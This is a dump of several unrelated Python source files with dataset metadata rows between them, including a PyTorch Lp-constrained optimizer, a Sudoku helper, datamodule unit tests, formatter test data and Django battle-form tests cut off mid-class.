            raise ValueError("Invalid momentum value: {}".format(momentum))
        if weight_decay < 0.0:
            raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
        defaults = dict(lr=lr, lr_decay=lr_decay, momentum=momentum, dampening=dampening,
                        weight_decay=weight_decay, nesterov=nesterov)
        if nesterov and (momentum <= 0 or dampening != 0):
            raise ValueError("Nesterov momentum requires a momentum and zero dampening")
        self.sum_iter = 0        # number of step() calls; drives the lr decay
        self.general_norm = 1
        self.net_lp = net_lp
        self.lp_layers = lp_layers
        self.min_input_channel = min_input_channel
        # each excluded layer is assumed to contribute two parameters (weight + bias)
        self.forbid_layers = forbid_layers * 2
        self.name_list = [name for name, _ in model.named_parameters()]
        super(LpCGD, self).__init__(model.parameters(), defaults)
        self.weightNormalize()

    def weightNormalize(self):
        """Expand ``self.net_lp`` into a per-parameter list (None = not Lp-constrained)
        and project the selected weights with ``myF.LpNormalize_cnn`` in place."""
        layer_n = len(self.name_list)
        net_lp = [None] * layer_n
        count = 0
        for i, name in enumerate(self.name_list):
            if i >= layer_n - self.forbid_layers:
                break
            # a parameter is Lp-constrained when its name matches one of the
            # lp_layers substrings and it is a weight (not a bias)
            if any(lp_layer in name for lp_layer in self.lp_layers) and 'weight' in name:
                net_lp[i] = self.net_lp[count]
                count += 1
        self.net_lp = net_lp
        # normalize the selected weights
        for group in self.param_groups:
            for i, p in enumerate(group['params']):
                if p.data is None or net_lp[i] is None:
                    continue
                cp = p.data
                # only conv/fc-shaped weights with enough input channels qualify
                if cp.dim() < 2 or cp.dim() > 4 or cp.size(1) < self.min_input_channel:
                    net_lp[i] = None
                    continue
                p.data, _ = myF.LpNormalize_cnn(cp, net_lp[i])

    def __setstate__(self, state):
        super(LpCGD, self).__setstate__(state)
        for group in self.param_groups:
            group.setdefault('nesterov', False)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        net_lp = self.net_lp
        for group in self.param_groups:
            # decayed learning rate for this iteration
            cur_lr = group['lr'] / (1 + group['lr_decay'] * self.sum_iter)
            self.sum_iter += 1
            weight_decay = group['weight_decay']
            momentum = group['momentum']
            dampening = group['dampening']
            nesterov = group['nesterov']
            for i, p in enumerate(group['params']):
                if p.grad is None:
                    continue
                d_p = p.grad.data
                if weight_decay != 0:
                    # FIX: use the `alpha` keyword form throughout; the positional
                    # Tensor.add_/add(scalar, tensor) overload is deprecated.
                    d_p.add_(p.data, alpha=weight_decay)
                param_state = self.state[p]
                if momentum != 0:
                    if 'momentum_buffer' not in param_state:
                        buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
                        buf.add_(d_p)
                    else:
                        buf = param_state['momentum_buffer']
                        buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
                    if nesterov:
                        d_p = d_p.add(buf, alpha=momentum)
                    else:
                        d_p = buf
                lp = net_lp[i]
                if lp is not None:
                    # Lp-constrained weight: step in the feature-vector space
                    # v(w) = sign(w)*|w|^(p-1), renormalize, and map back to w.
                    w = p.data
                    if 'feature_vec' not in param_state:
                        ftv = param_state['feature_vec'] = w.sign().mul(w.abs().pow(lp - 1))
                    else:
                        ftv = param_state['feature_vec']
                    d_pc, inv_norm_d = myF.LpNormalize_cnn(d_p, lp, lp - 1)
                    ftv = ftv.mul(1 - cur_lr).add(d_pc, alpha=-cur_lr)
                    ftv, _ = myF.LpNormalize_cnn(ftv, lp, lp - 1)
                    param_state['feature_vec'] = ftv
                    p.data = ftv.sign().mul(ftv.abs().pow(1 / (lp - 1)))
                else:
                    # bias or unconstrained parameter: plain (momentum) SGD step
                    b = p.data
                    b.add_(d_p, alpha=-cur_lr)
        return loss
class LpCGDw(Optimizer):
    r"""Implements Lp constrained gradient descent (optionally with momentum).

    This version directly updates the weight instead of updating the feature
    vector defined as:
        v(w) = w^(p-1)

    Nesterov momentum is based on the formula from
    `On the importance of initialization and momentum in deep learning`__.

    Args:
        model: module whose parameters are optimized
        net_lp (list): Lp norm of weight for each Lp-constrained layer
        lp_layers (list, optional): name substrings selecting the layers whose
            weights are Lp-normalized (default: ['conv', 'fc'])
        forbid_layers (int, optional): number of trailing parameters excluded
            from Lp normalization (default: 1)
        lr (float): learning rate
        lr_decay (float): decay of learning rate (default: 0)
        momentum (float, optional): momentum factor (default: 0)
        dampening (float, optional): dampening for momentum (default: 0)
        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
        nesterov (bool, optional): enables Nesterov momentum (default: False)
    """

    def __init__(self, model, net_lp, lp_layers: list = None, forbid_layers: int = 1,
                 lr=required, lr_decay=0, momentum=0, dampening=0,
                 weight_decay=0, nesterov=False):
        # FIX: the former default lp_layers=['conv', 'fc'] was a mutable default
        # argument (one list object shared by every instance); use a None sentinel.
        if lp_layers is None:
            lp_layers = ['conv', 'fc']
        # validate hyper-parameters
        if lr is not required and lr < 0.0:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if lr_decay < 0.0:
            raise ValueError("Invalid lr_decay rate: {}".format(lr_decay))
        if momentum < 0.0:
            raise ValueError("Invalid momentum value: {}".format(momentum))
        if weight_decay < 0.0:
            raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
        defaults = dict(lr=lr, lr_decay=lr_decay, momentum=momentum, dampening=dampening,
                        weight_decay=weight_decay, nesterov=nesterov)
        if nesterov and (momentum <= 0 or dampening != 0):
            raise ValueError("Nesterov momentum requires a momentum and zero dampening")
        # record the parameter names so weightNormalize can match layers
        self.sum_iter = 0        # number of step() calls; drives the lr decay
        self.general_norm = 1
        self.net_lp = net_lp
        self.lp_layers = lp_layers
        self.forbid_layers = forbid_layers
        self.name_list = [name for name, _ in model.named_parameters()]
        super(LpCGDw, self).__init__(model.parameters(), defaults)
        self.weightNormalize()

    def weightNormalize(self):
        """Expand ``self.net_lp`` into a per-parameter list (None = not Lp-constrained)
        and project the selected weights with ``myF.LpNormalize_cnn`` in place."""
        layer_n = len(self.name_list)
        net_lp = [None] * layer_n
        count = 0
        for i, name in enumerate(self.name_list):
            if i >= layer_n - self.forbid_layers:
                break
            # a parameter is Lp-constrained when its name matches one of the
            # lp_layers substrings and it is a weight (not a bias)
            if any(lp_layer in name for lp_layer in self.lp_layers) and 'weight' in name:
                net_lp[i] = self.net_lp[count]
                count += 1
        self.net_lp = net_lp
        # normalize the selected weights
        for group in self.param_groups:
            for i, p in enumerate(group['params']):
                if p.data is None or net_lp[i] is None:
                    continue
                cp = p.data
                # only conv/fc-shaped weights qualify
                if cp.dim() < 2 or cp.dim() > 4:
                    net_lp[i] = None
                    continue
                p.data, _ = myF.LpNormalize_cnn(cp, net_lp[i])

    def __setstate__(self, state):
        super(LpCGDw, self).__setstate__(state)
        for group in self.param_groups:
            group.setdefault('nesterov', False)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        net_lp = self.net_lp
        for group in self.param_groups:
            # decayed learning rate for this iteration
            cur_lr = group['lr'] / (1 + group['lr_decay'] * self.sum_iter)
            self.sum_iter += 1
            weight_decay = group['weight_decay']
            momentum = group['momentum']
            dampening = group['dampening']
            nesterov = group['nesterov']
            for i, p in enumerate(group['params']):
                if p.grad is None:
                    continue
                d_p = p.grad.data
                if weight_decay != 0:
                    # FIX: use the `alpha` keyword form throughout; the positional
                    # Tensor.add_/add(scalar, tensor) overload is deprecated.
                    d_p.add_(p.data, alpha=weight_decay)
                if momentum != 0:
                    param_state = self.state[p]
                    if 'momentum_buffer' not in param_state:
                        buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
                        buf.add_(d_p)
                    else:
                        buf = param_state['momentum_buffer']
                        buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
                    if nesterov:
                        d_p = d_p.add(buf, alpha=momentum)
                    else:
                        d_p = buf
                lp = net_lp[i]
                if lp is not None:
                    # weight update of a convolution / fully connected layer
                    w = p.data
                    # unit gradient on the p/(p-1) norm space
                    d_pc, inv_norm_d = myF.LpNormalize_cnn(d_p, lp, lp - 1)
                    # w(t+1) = (1 - lr) * w(t) - lr * gradient ^ (1/(p-1))
                    d_pc = d_pc.sign().mul(d_pc.abs().pow(1 / (lp - 1)))
                    w = w.mul(1 - cur_lr).add(d_pc, alpha=-cur_lr)
                    p.data, _ = myF.LpNormalize_cnn(w, lp, 1)
                else:
                    # bias or unconstrained parameter: plain (momentum) SGD step
                    b = p.data
                    b.add_(d_p, alpha=-cur_lr)
        return loss
| 37.34891
| 123
| 0.537576
| 1,440
| 11,989
| 4.308333
| 0.124306
| 0.024178
| 0.02579
| 0.021921
| 0.875403
| 0.85332
| 0.84784
| 0.839781
| 0.829142
| 0.822695
| 0
| 0.010893
| 0.372091
| 11,989
| 321
| 124
| 37.34891
| 0.813231
| 0.206189
| 0
| 0.831633
| 0
| 0
| 0.066294
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.015306
| 0
| 0.076531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fdcfd222ed9c8847e9893d6828fd67532128667a
| 805
|
py
|
Python
|
utils.py
|
shinning91/SudokuSolverGUI
|
3ac1f6de57094e98f67525a9ebece33bba152eab
|
[
"MIT"
] | null | null | null |
utils.py
|
shinning91/SudokuSolverGUI
|
3ac1f6de57094e98f67525a9ebece33bba152eab
|
[
"MIT"
] | null | null | null |
utils.py
|
shinning91/SudokuSolverGUI
|
3ac1f6de57094e98f67525a9ebece33bba152eab
|
[
"MIT"
] | null | null | null |
def get_square_3x3(grid, row, column):
    """Return the 3x3 sub-square of a 9x9 Sudoku grid containing (row, column).

    Replaces the original nine-branch if/elif pyramid with box-corner
    arithmetic; results are identical for all coordinates in 0..8.

    Args:
        grid: 9x9 nested sequence of cell values.
        row: 0-based row index of a cell (0..8).
        column: 0-based column index of a cell (0..8).

    Returns:
        A list of three lists, each a copy of the 3-cell slice of one grid row.
    """
    # Top-left corner of the 3x3 box that contains the cell.
    row_start = (row // 3) * 3
    col_start = (column // 3) * 3
    return [grid[i][col_start:col_start + 3] for i in range(row_start, row_start + 3)]
| 33.541667
| 56
| 0.462112
| 137
| 805
| 2.70073
| 0.138686
| 0.243243
| 0.267568
| 0.267568
| 0.848649
| 0.848649
| 0.821622
| 0.778378
| 0.778378
| 0.778378
| 0
| 0.092184
| 0.380124
| 805
| 24
| 57
| 33.541667
| 0.649299
| 0
| 0
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3084f36c82aa08c2055ae3cc2c5b2718a69076c
| 3,652
|
py
|
Python
|
neural_clbf/datamodules/tests/test_episodic_datamodule.py
|
saxenam06/neural_clbf
|
1f2a43b579330172a03f284a5673b00f0899c755
|
[
"BSD-3-Clause"
] | 9
|
2022-01-22T11:47:11.000Z
|
2022-03-08T14:49:38.000Z
|
neural_clbf/datamodules/tests/test_episodic_datamodule.py
|
saxenam06/neural_clbf
|
1f2a43b579330172a03f284a5673b00f0899c755
|
[
"BSD-3-Clause"
] | 1
|
2021-11-14T22:30:20.000Z
|
2021-11-19T14:40:49.000Z
|
neural_clbf/datamodules/tests/test_episodic_datamodule.py
|
saxenam06/neural_clbf
|
1f2a43b579330172a03f284a5673b00f0899c755
|
[
"BSD-3-Clause"
] | 5
|
2022-01-23T17:02:52.000Z
|
2022-03-29T22:26:59.000Z
|
"""Test the data generation for the f16 gcas"""
import random
from typing import Dict
import torch
from neural_clbf.datamodules.episodic_datamodule import EpisodicDataModule
from neural_clbf.systems.tests.mock_system import MockSystem
# Shared mock dynamics system (empty parameter dict) used by every test below.
params: Dict[str, float] = {}
model = MockSystem(params)
def test_episodic_datamodule():
    """Test the EpisodicDataModule"""
    # Fix the RNG seeds so the sampled data is repeatable
    random.seed(0)
    torch.manual_seed(0)

    domain = [
        (-1.0, 1.0),
        (-1.0, 1.0),
    ]
    datamodule = EpisodicDataModule(
        model,
        domain,
        trajectories_per_episode=100,
        trajectory_length=50,
        fixed_samples=1000,
        val_split=0.1,
        batch_size=10,
    )
    assert datamodule is not None

    # Preparing the data should populate the train/validation splits
    datamodule.prepare_data()
    n_total = (
        datamodule.trajectories_per_episode * datamodule.trajectory_length
        + datamodule.fixed_samples
    )
    n_val = int(n_total * datamodule.val_split)
    n_train = n_total - n_val
    assert datamodule.x_training.shape[0] == n_train
    assert datamodule.x_training.shape[1] == model.n_dims
    assert datamodule.x_validation.shape[0] == n_val
    assert datamodule.x_validation.shape[1] == model.n_dims

    # The same points should be reachable through the datasets
    assert len(datamodule.training_data) == n_train
    assert len(datamodule.validation_data) == n_val

    # Each sample should carry four items: (point, goal, safe, unsafe)
    for sample in datamodule.training_data:
        assert len(sample) == 4
    for sample in datamodule.validation_data:
        assert len(sample) == 4

    # The dataloaders should batch the points as configured
    assert len(datamodule.train_dataloader()) == round(n_train / datamodule.batch_size)
    assert len(datamodule.val_dataloader()) == round(n_val / datamodule.batch_size)
def test_episodic_datamodule_quotas():
    """Exercise EpisodicDataModule when per-region sampling quotas are set."""
    # Seed both RNGs so the sampled dataset is reproducible run to run.
    random.seed(0)
    torch.manual_seed(0)

    # Unit box in both state dimensions for the initial conditions.
    domain = [(-1.0, 1.0), (-1.0, 1.0)]
    dm = EpisodicDataModule(
        model,
        domain,
        trajectories_per_episode=100,
        trajectory_length=50,
        fixed_samples=1000,
        val_split=0.1,
        batch_size=10,
        quotas={"safe": 0.1, "unsafe": 0.1, "goal": 0.1},
    )
    assert dm is not None

    # Quotas redistribute where fixed samples come from but should not change
    # the total point count or the train/val split sizes.
    dm.prepare_data()
    total_pts = dm.trajectories_per_episode * dm.trajectory_length
    total_pts += dm.fixed_samples
    n_val = int(total_pts * dm.val_split)
    n_train = total_pts - n_val

    assert dm.x_training.shape[0] == n_train
    assert dm.x_training.shape[1] == model.n_dims
    assert dm.x_validation.shape[0] == n_val
    assert dm.x_validation.shape[1] == model.n_dims

    # The same points should back the train/val datasets.
    assert len(dm.training_data) == n_train
    assert len(dm.validation_data) == n_val

    # Every sample should be a (point, goal, safe, unsafe) 4-tuple.
    assert all(len(sample) == 4 for sample in dm.training_data)
    assert all(len(sample) == 4 for sample in dm.validation_data)

    # The dataloaders should batch each split by the configured batch size.
    assert len(dm.train_dataloader()) == round(n_train / dm.batch_size)
    assert len(dm.val_dataloader()) == round(n_val / dm.batch_size)
| 32.607143
| 80
| 0.684556
| 520
| 3,652
| 4.598077
| 0.211538
| 0.045169
| 0.070263
| 0.010038
| 0.83898
| 0.83898
| 0.83898
| 0.83898
| 0.83898
| 0.83898
| 0
| 0.023264
| 0.223165
| 3,652
| 111
| 81
| 32.900901
| 0.819528
| 0.197426
| 0
| 0.825
| 0
| 0
| 0.004821
| 0
| 0
| 0
| 0
| 0
| 0.275
| 1
| 0.025
| false
| 0
| 0.0625
| 0
| 0.0875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e345bb90276c709939125f2e366f45318e973486
| 267
|
py
|
Python
|
tests/data/numeric_literals_skip_underscores.py
|
StarryInternet/black
|
f90f50a7436ca13517933c290ef007e7cb2e7258
|
[
"MIT"
] | 16,110
|
2019-07-22T21:54:54.000Z
|
2022-03-31T22:52:39.000Z
|
tests/data/numeric_literals_skip_underscores.py
|
StarryInternet/black
|
f90f50a7436ca13517933c290ef007e7cb2e7258
|
[
"MIT"
] | 1,981
|
2019-07-22T21:26:16.000Z
|
2022-03-31T23:14:35.000Z
|
tests/data/numeric_literals_skip_underscores.py
|
StarryInternet/black
|
f90f50a7436ca13517933c290ef007e7cb2e7258
|
[
"MIT"
] | 1,762
|
2019-07-22T21:23:00.000Z
|
2022-03-31T06:10:22.000Z
|
#!/usr/bin/env python3.6
x = 123456789
x = 1_2_3_4_5_6_7
x = 1E+1
x = 0xb1acc
x = 0.00_00_006
x = 12_34_567J
x = .1_2
x = 1_2.
# output
#!/usr/bin/env python3.6
x = 123456789
x = 1_2_3_4_5_6_7
x = 1e1
x = 0xB1ACC
x = 0.00_00_006
x = 12_34_567j
x = 0.1_2
x = 1_2.0
| 11.608696
| 24
| 0.651685
| 72
| 267
| 2.083333
| 0.319444
| 0.08
| 0.1
| 0.213333
| 0.906667
| 0.84
| 0.84
| 0.84
| 0.84
| 0.84
| 0
| 0.4
| 0.213483
| 267
| 23
| 25
| 11.608696
| 0.314286
| 0.198502
| 0
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066038
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3875487749406bddcc253f97b7467b00823cde5
| 27
|
py
|
Python
|
djangoproject/pages/namer.py
|
dipak122/MyDjangoProject
|
e3a1bbf996f4b818d4d70eea42eb79ca662a2faa
|
[
"bzip2-1.0.6"
] | null | null | null |
djangoproject/pages/namer.py
|
dipak122/MyDjangoProject
|
e3a1bbf996f4b818d4d70eea42eb79ca662a2faa
|
[
"bzip2-1.0.6"
] | null | null | null |
djangoproject/pages/namer.py
|
dipak122/MyDjangoProject
|
e3a1bbf996f4b818d4d70eea42eb79ca662a2faa
|
[
"bzip2-1.0.6"
] | null | null | null |
def namer():
    """Return the constant value 5 (computed as 2 + 3)."""
    total = 2 + 3
    return total
| 13.5
| 14
| 0.592593
| 5
| 27
| 3.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 0.259259
| 27
| 2
| 14
| 13.5
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
473ea662ed0889fd47c92f4a50622573a3b8be94
| 102
|
py
|
Python
|
app/airq/management/__init__.py
|
ianhoffman/airq
|
986a5948d87169b5828b5488ea968a18d9f549db
|
[
"MIT"
] | 5
|
2020-08-31T02:02:54.000Z
|
2020-09-11T22:20:48.000Z
|
app/airq/management/__init__.py
|
ianhoffman/airq
|
986a5948d87169b5828b5488ea968a18d9f549db
|
[
"MIT"
] | 53
|
2020-09-14T04:04:43.000Z
|
2022-01-31T06:57:18.000Z
|
app/airq/management/__init__.py
|
ianhoffman/airq
|
986a5948d87169b5828b5488ea968a18d9f549db
|
[
"MIT"
] | 1
|
2020-10-03T08:18:16.000Z
|
2020-10-03T08:18:16.000Z
|
from airq.management.generate_fixtures import generate_fixtures
from airq.management.sync import sync
| 34
| 63
| 0.882353
| 14
| 102
| 6.285714
| 0.5
| 0.181818
| 0.409091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 102
| 2
| 64
| 51
| 0.93617
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
47872f8e7c4856376a7387b557797e7d7eb9c882
| 193
|
py
|
Python
|
syn/conf/__init__.py
|
mbodenhamer/syn
|
aeaa3ad8a49bac8f50cf89b6f1fe97ad43d1d258
|
[
"MIT"
] | 1
|
2021-07-15T08:55:12.000Z
|
2021-07-15T08:55:12.000Z
|
syn/conf/__init__.py
|
mbodenhamer/syn
|
aeaa3ad8a49bac8f50cf89b6f1fe97ad43d1d258
|
[
"MIT"
] | 7
|
2021-01-07T23:51:57.000Z
|
2021-12-13T19:50:57.000Z
|
syn/conf/__init__.py
|
mbodenhamer/syn
|
aeaa3ad8a49bac8f50cf89b6f1fe97ad43d1d258
|
[
"MIT"
] | 2
|
2016-07-11T08:46:31.000Z
|
2017-12-13T13:30:51.000Z
|
from .conf import *
from .conf2 import *
from .vars import *
from syn.base_utils import harvest_metadata, delete
# Populate this package's metadata from the YAML file at import time, then
# remove the two imported helper names from the module namespace.
# NOTE(review): `delete` appears to act as a context manager that deletes the
# given names (here: harvest_metadata and delete itself) on exit, so they are
# not re-exported from syn.conf — confirm against syn.base_utils.
with delete(harvest_metadata, delete):
    harvest_metadata('../metadata.yml')
| 24.125
| 51
| 0.761658
| 26
| 193
| 5.5
| 0.5
| 0.20979
| 0.293706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005988
| 0.134715
| 193
| 7
| 52
| 27.571429
| 0.850299
| 0
| 0
| 0
| 0
| 0
| 0.07772
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
478ee4f34522cca1893ec8c3fabd35688dafe866
| 52
|
py
|
Python
|
python/testData/codeInsight/mlcompletion/haveOpeningSquareBracket.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/codeInsight/mlcompletion/haveOpeningSquareBracket.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2022-02-19T09:45:05.000Z
|
2022-02-27T20:32:55.000Z
|
python/testData/codeInsight/mlcompletion/haveOpeningSquareBracket.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
k1 = 1
k2 = 22
dct = {k1: "1", k2: "22"}
dct[<caret>
| 13
| 25
| 0.480769
| 11
| 52
| 2.272727
| 0.545455
| 0.24
| 0.4
| 0.56
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.230769
| 52
| 4
| 26
| 13
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
47a20de53e920aac9580322759efd1b5f713eeb8
| 9,452
|
py
|
Python
|
backend/battles/tests/test_forms.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | null | null | null |
backend/battles/tests/test_forms.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | 4
|
2021-01-05T18:51:30.000Z
|
2021-04-07T17:03:08.000Z
|
backend/battles/tests/test_forms.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | null | null | null |
import responses
from django.test import TestCase
from model_mommy import mommy
from battles.forms import BattleForm, BattleOpponentPokemonsForm
from common.constants import POKEAPI_BASE_URL
class BattleCreateFormTests(TestCase):
    """Tests for BattleForm: battle creation, creator rules, and the
    600-point team limit.

    The original tests repeated ~40 lines of identical fixture setup in
    every test; that setup is factored into private helpers below. Test
    behavior and assertions are unchanged.
    """

    # Fixture stat rows: (poke_id, attack, defense, hit_points).
    DEFAULT_STATS = [(1, 49, 49, 45), (2, 64, 64, 50), (3, 69, 69, 55)]
    # Maxed-out stats used to exceed the 600-point team limit.
    MAX_STATS = [(1, 100, 100, 100), (2, 100, 100, 100), (3, 100, 100, 100)]

    @staticmethod
    def _mock_pokeapi():
        """Register mocked HEAD responses for the three fixture pokemon."""
        for name in ("pokemon1", "pokemon2", "pokemon3"):
            responses.add(
                responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/{name}", status=200
            )

    @staticmethod
    def _make_pokemon(poke_id, attack, defense, hit_points):
        """Create one Pokemon fixture whose name and image track its poke_id."""
        return mommy.make(
            "pokemons.Pokemon",
            poke_id=poke_id,
            name=f"pokemon{poke_id}",
            attack=attack,
            defense=defense,
            hit_points=hit_points,
            image="https://raw.githubusercontent.com/"
            f"PokeAPI/sprites/master/sprites/pokemon/{poke_id}.png",
        )

    @classmethod
    def _make_team(cls, stats):
        """Mock the PokeAPI and build one Pokemon fixture per stat row."""
        cls._mock_pokeapi()
        return [cls._make_pokemon(*row) for row in stats]

    @responses.activate
    def test_create_battle(self):
        pokemon_1, pokemon_2, pokemon_3 = self._make_team(self.DEFAULT_STATS)
        current_user = mommy.make("users.User")
        opponent = mommy.make("users.User", email="opponent@test.com")
        data = {
            "opponent": opponent.id,
            "creator_pokemon_1": pokemon_1.id,
            "creator_pokemon_2": pokemon_2.id,
            "creator_pokemon_3": pokemon_3.id,
        }
        form = BattleForm(data=data, current_user=current_user)
        self.assertTrue(form.is_valid())
        battle = form.save()
        # The creator always comes from the authenticated user, not form data.
        self.assertEqual(battle.creator, current_user)
        self.assertEqual(battle.opponent, opponent)
        self.assertEqual(battle.creator_pokemon_1.poke_id, 1)
        self.assertEqual(battle.creator_pokemon_2.poke_id, 2)
        self.assertEqual(battle.creator_pokemon_3.poke_id, 3)

    @responses.activate
    def test_cannot_create_battle_with_creator_as_opponent(self):
        pokemon_1, pokemon_2, pokemon_3 = self._make_team(self.DEFAULT_STATS)
        current_user = mommy.make("users.User")
        # Naming yourself as the opponent must be rejected on the
        # "opponent" field.
        data = {
            "opponent": current_user.id,
            "creator_pokemon_1": pokemon_1.id,
            "creator_pokemon_2": pokemon_2.id,
            "creator_pokemon_3": pokemon_3.id,
        }
        form = BattleForm(data=data, current_user=current_user)
        self.assertFalse(form.is_valid())
        self.assertIn("opponent", form.errors)

    @responses.activate
    def test_cannot_force_a_creator_user(self):
        pokemon_1, pokemon_2, pokemon_3 = self._make_team(self.DEFAULT_STATS)
        current_user = mommy.make("users.User")
        fake_creator_user = mommy.make("users.User")
        opponent = mommy.make("users.User")
        # A "creator" key smuggled into the form data must be ignored in
        # favor of the authenticated user.
        data = {
            "creator": fake_creator_user.id,
            "opponent": opponent.id,
            "creator_pokemon_1": pokemon_1.id,
            "creator_pokemon_2": pokemon_2.id,
            "creator_pokemon_3": pokemon_3.id,
        }
        form = BattleForm(data=data, current_user=current_user)
        self.assertTrue(form.is_valid())
        battle = form.save()
        self.assertEqual(battle.creator, current_user)

    @responses.activate
    def test_cannot_create_battle_if_pokemon_points_sum_more_than_600(self):
        # Three maxed pokemon sum to 900 points, over the 600 limit.
        pokemon_1, pokemon_2, pokemon_3 = self._make_team(self.MAX_STATS)
        current_user = mommy.make("users.User")
        opponent = mommy.make("users.User", email="opponent@test.com")
        data = {
            "opponent": opponent.id,
            "creator_pokemon_1": pokemon_1.id,
            "creator_pokemon_2": pokemon_2.id,
            "creator_pokemon_3": pokemon_3.id,
        }
        form = BattleForm(data=data, current_user=current_user)
        self.assertFalse(form.is_valid())
        self.assertEqual(["Pokemons' points sum cannot be more than 600"], form.errors["__all__"])
class BattleOpponentPokemonsFormTests(TestCase):
    """Tests for BattleOpponentPokemonsForm's 600-point team limit.

    The original test repeated the same 10-line fixture block three times;
    it is factored into a helper below. Behavior is unchanged.
    """

    @staticmethod
    def _make_maxed_pokemon(poke_id):
        """Create a 100/100/100 Pokemon fixture keyed by poke_id."""
        return mommy.make(
            "pokemons.Pokemon",
            poke_id=poke_id,
            name=f"pokemon{poke_id}",
            attack=100,
            defense=100,
            hit_points=100,
            image="https://raw.githubusercontent.com/"
            f"PokeAPI/sprites/master/sprites/pokemon/{poke_id}.png",
        )

    @responses.activate
